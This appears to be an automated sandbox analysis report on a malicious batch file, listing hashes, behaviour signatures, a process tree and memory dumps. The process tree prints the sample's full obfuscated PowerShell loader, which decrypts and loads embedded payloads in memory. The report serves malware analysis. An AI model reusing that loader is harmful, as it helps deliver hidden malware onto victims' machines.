f0e5b0472df1921c5b9c32c0dc4c1a3a2cc15084b72df00fe2710f63221ee224

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
16-03-2024 03:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

windows.cmd
Size

66KB
MD5

3a56f31eda19041d7ea9aeab089847eb
SHA1

1ca9985ab27390bdd710c5f6d09af344b69ed56b
SHA256

562cc7b2b867668ff252095a3bb3dc0641428fddd6ea23cfca475541fc10cbf9
SHA512

1c633d473ed3ac06acfb06f012e5c7e0dc8402b8bba9680a4b97fe5282a5f8614331b2bed6132fa4d583f67022aa5ef0a7b96774cda94861c396be2250d149ca
SSDEEP

1536:gElMViXyqGaO24iKbBG6IV3VvhRvRt/rCwIK4GfFjR:gn71aO24FdG6INVvhRptTCSNFjR

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2376	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2376	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 2328	2232	cmd.exe	29
PID 2232 wrote to memory of 2328	2232	cmd.exe	29
PID 2232 wrote to memory of 2328	2232	cmd.exe	29
PID 2328 wrote to memory of 1756	2328	cmd.exe	31
PID 2328 wrote to memory of 1756	2328	cmd.exe	31
PID 2328 wrote to memory of 1756	2328	cmd.exe	31
PID 2328 wrote to memory of 2376	2328	cmd.exe	32
PID 2328 wrote to memory of 2376	2328	cmd.exe	32
PID 2328 wrote to memory of 2376	2328	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows.cmd';$WLJw='InCvYLvCvYLokCvYLeCvYL'.Replace('CvYL', ''),'TGQJMraGQJMnsfGQJMormGQJMFinGQJMaGQJMlGQJMBGQJMloGQJMckGQJM'.Replace('GQJM', ''),'SplSyGditSyGd'.Replace('SyGd', ''),'ElwKIbemwKIbewKIbntAwKIbtwKIb'.Replace('wKIb', ''),'LoaLqPaaLqPdaLqP'.Replace('aLqP', ''),'GeZtXeeZtXteZtXCueZtXrreeZtXneZtXtPreZtXoeZtXceseZtXseZtX'.Replace('eZtX', ''),'EntPkLTryPPkLToinPkLTtPkLT'.Replace('PkLT', ''),'CKpdDopyKpdDToKpdD'.Replace('KpdD', ''),'ReeqVLadLeqVLieqVLneeqVLseqVL'.Replace('eqVL', ''),'DdbPkecdbPkompdbPkrdbPkessdbPk'.Replace('dbPk', ''),'CLyDOreaLyDOteLyDODeLyDOcryLyDOpLyDOtLyDOorLyDO'.Replace('LyDO', ''),'FIaBCroIaBCmBaIaBCsIaBCe64IaBCStIaBCrIaBCinIaBCgIaBC'.Replace('IaBC', ''),'MIJoCaIJoCinIJoCMIJoCoduIJoCleIJoC'.Replace('IJoC', ''),'ChaQjVanaQjVgaQjVeaQjVExtaQjVensaQjVioaQjVnaQjV'.Replace('aQjV', '');powershell -w hidden;function ImYLZ($JnwiD){$XxYKa=[System.Security.Cryptography.Aes]::Create();$XxYKa.Mode=[System.Security.Cryptography.CipherMode]::CBC;$XxYKa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$XxYKa.Key=[System.Convert]::($WLJw[11])('T0dKGXhcNl1TXEBdsATQZk5fcZVOR6MRYQ0653LUp+o=');$XxYKa.IV=[System.Convert]::($WLJw[11])('Z5oBwCXIC4JH125OsE/9wg==');$iuKeX=$XxYKa.($WLJw[10])();$zSovn=$iuKeX.($WLJw[1])($JnwiD,0,$JnwiD.Length);$iuKeX.Dispose();$XxYKa.Dispose();$zSovn;}function pYWXC($JnwiD){$EfKAz=New-Object System.IO.MemoryStream(,$JnwiD);$wKBJr=New-Object System.IO.MemoryStream;$NjZtV=New-Object System.IO.Compression.GZipStream($EfKAz,[IO.Compression.CompressionMode]::($WLJw[9]));$NjZtV.($WLJw[7])($wKBJr);$NjZtV.Dispose();$EfKAz.Dispose();$wKBJr.Dispose();$wKBJr.ToArray();}$lxWGc=[System.IO.File]::($WLJw[8])([Console]::Title);$hbekG=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 5).Substring(2))));$FPrZl=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 6).Substring(2))));[System.Reflection.Assembly]::($WLJw[4])([byte[]]$FPrZl).($WLJw[6]).($WLJw[0])($null,$null);[System.Reflection.Assembly]::($WLJw[4])([byte[]]$hbekG).($WLJw[6]).($WLJw[0])($null,$null); "
    3⤵
    PID:1756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2376

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2376-4-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2376-5-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2376-6-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2376-7-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-8-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2376-10-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-9-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-11-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-12-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2376-13-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-14-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-15-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-16-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download